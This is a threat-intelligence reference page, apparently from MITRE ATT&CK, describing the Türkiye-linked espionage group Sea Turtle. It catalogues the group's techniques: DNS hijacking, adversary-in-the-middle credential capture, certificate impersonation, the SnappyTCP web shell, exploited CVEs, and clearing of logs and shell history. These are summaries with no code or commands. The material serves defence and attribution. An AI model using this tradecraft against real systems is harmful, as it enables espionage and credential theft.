Sea Turtle

Sea Turtle is a Türkiye-linked threat actor active since at least 2017 performing espionage and service provider compromise operations against victims in Asia, Europe, and North America. Sea Turtle is notable for targeting registrars managing ccTLDs and complex DNS-based intrusions where the threat actor compromised DNS providers to hijack DNS resolution for ultimate victims, enabling Sea Turtle to spoof log in portals and other applications for credential collection.^[1]^[2]^[3]^[4]

ID: G1041

ⓘ

Associated Groups: Teal Kurma, Marbled Dust, Cosmic Wolf, SILICON

Contributors: Inna Danilevich, U.S. Bank; Joe Gumke, U.S. Bank

Version: 1.0

Created: 20 November 2024

Last Modified: 28 March 2025

Version Permalink

Live Version

Associated Group Descriptions

Name	Description
Teal Kurma	^[3]^[4]
Marbled Dust	^[3]^[4]
Cosmic Wolf	^[3]^[4]
SILICON	^[5]^[4]

Techniques Used

Domain	ID		Name	Use
Enterprise	T1583		Acquire Infrastructure	Sea Turtle accessed victim networks from VPN service provider networks.^[4]
		.001	Domains	Sea Turtle registered domains for authoritative name servers used in DNS hijacking activity and for command and control servers.^[2]^[4]
		.002	DNS Server	Sea Turtle built adversary-in-the-middle DNS servers to impersonate legitimate services that were later used to capture credentials.^[2]^[1]
		.003	Virtual Private Server	Sea Turtle created adversary-in-the-middle servers to impersonate legitimate services and enable credential capture.^[1]
Enterprise	T1557		Adversary-in-the-Middle	Sea Turtle modified DNS records at service providers to redirect traffic from legitimate resources to Sea Turtle-controlled servers to enable adversary-in-the-middle attacks for credential capture.^[1]^[2]
Enterprise	T1071	.001	Application Layer Protocol: Web Protocols	Sea Turtle connected over TCP using HTTP to establish command and control channels.^[4]
Enterprise	T1560	.001	Archive Collected Data: Archive via Utility	Sea Turtle used the tar utility to create a local archive of email data on a victim system.^[4]
Enterprise	T1059	.004	Command and Scripting Interpreter: Unix Shell	Sea Turtle used shell scripts for post-exploitation execution in victim environments.^[3]^[4]
Enterprise	T1584	.002	Compromise Infrastructure: DNS Server	Sea Turtle modified Name Server (NS) items to refer to Sea Turtle-controlled DNS servers to provide responses for all DNS lookups.^[1]^[2]
Enterprise	T1213		Data from Information Repositories	Sea Turtle used the tool Adminer to remotely logon to the MySQL service of victim machines.^[4]
Enterprise	T1074	.002	Data Staged: Remote Data Staging	Sea Turtle staged collected email archives in the public web directory of a website that was accessible from the internet.^[4]
Enterprise	T1114	.001	Email Collection: Local Email Collection	Sea Turtle collected email archives from victim environments.^[4]
Enterprise	T1190		Exploit Public-Facing Application	Sea Turtle gained access to victim environments by exploiting multiple known vulnerabilities over several campaigns.^[1]^[3]
Enterprise	T1203		Exploitation for Client Execution	Sea Turtle has used exploits for vulnerabilities such as CVE-2021-44228, CVE-2021-21974, and CVE-2022-0847 to achieve client code execution.^[3]
Enterprise	T1133		External Remote Services	Sea Turtle has used external-facing SSH to achieve initial access to the IT environments of victim organizations.^[4]
Enterprise	T1564	.011	Hide Artifacts: Ignore Process Interrupts	Sea Turtle executed SnappyTCP using the tool NoHup, which keeps the malware running on a system after exiting the shell or terminal.^[4]
Enterprise	T1562	.003	Impair Defenses: Impair Command History Logging	Sea Turtle unset the Bash and MySQL history files on victim systems.^[4]
Enterprise	T1070	.002	Indicator Removal: Clear Linux or Mac System Logs	Sea Turtle has overwritten Linux system logs and unsets the Bash history file (effectively removing logging) during intrusions.^[4]
Enterprise	T1027	.004	Obfuscated Files or Information: Compile After Delivery	Sea Turtle downloaded source code files from remote addresses then compiled them locally via GCC in victim environments.^[4]
Enterprise	T1588	.002	Obtain Capabilities: Tool	Sea Turtle has used tools such as Adminer during intrusions.^[4]
		.004	Obtain Capabilities: Digital Certificates	Sea Turtle created new certificates using a technique called the actors performed "certificate impersonation," a technique in which Sea Turtle obtained a certificate authority-signed X.509 certificate from another provider for the same domain imitating the one already used by the targeted organization.^[1]^[2]
Enterprise	T1566		Phishing	Sea Turtle used spear phishing to gain initial access to victims.^[1]
Enterprise	T1505	.003	Server Software Component: Web Shell	Sea Turtle deployed the SnappyTCP web shell during intrusion operations.^[3]^[4]
Enterprise	T1608	.003	Stage Capabilities: Install Digital Certificate	Sea Turtle captured legitimate SSL certificates from victim organizations and installed these on Sea Turtle-controlled infrastructure to enable subsequent adversary-in-the-middle operations.^[1]
Enterprise	T1199		Trusted Relationship	Sea Turtle targeted third-party entities in trusted relationships with primary targets to ultimately achieve access at primary targets. Entities targeted included DNS registrars, telecommunication companies, and internet service providers.^[1]
Enterprise	T1078		Valid Accounts	Sea Turtle used compromised credentials to maintain long-term access to victim environments.^[1]
		.003	Local Accounts	Sea Turtle compromised cPanel accounts in victim environments.^[4]

Software

ID	Name	References	Techniques
S1163	SnappyTCP	Sea Turtle used SnappyTCP following initial access in intrusions from 2021 to 2023.^[3]	Application Layer Protocol: Web Protocols, Command and Scripting Interpreter: Unix Shell, Encrypted Channel: Asymmetric Cryptography, Non-Application Layer Protocol, Server Software Component: Web Shell

Sea Turtle

Associated Group Descriptions

Enterprise Layer

Techniques Used

Software

References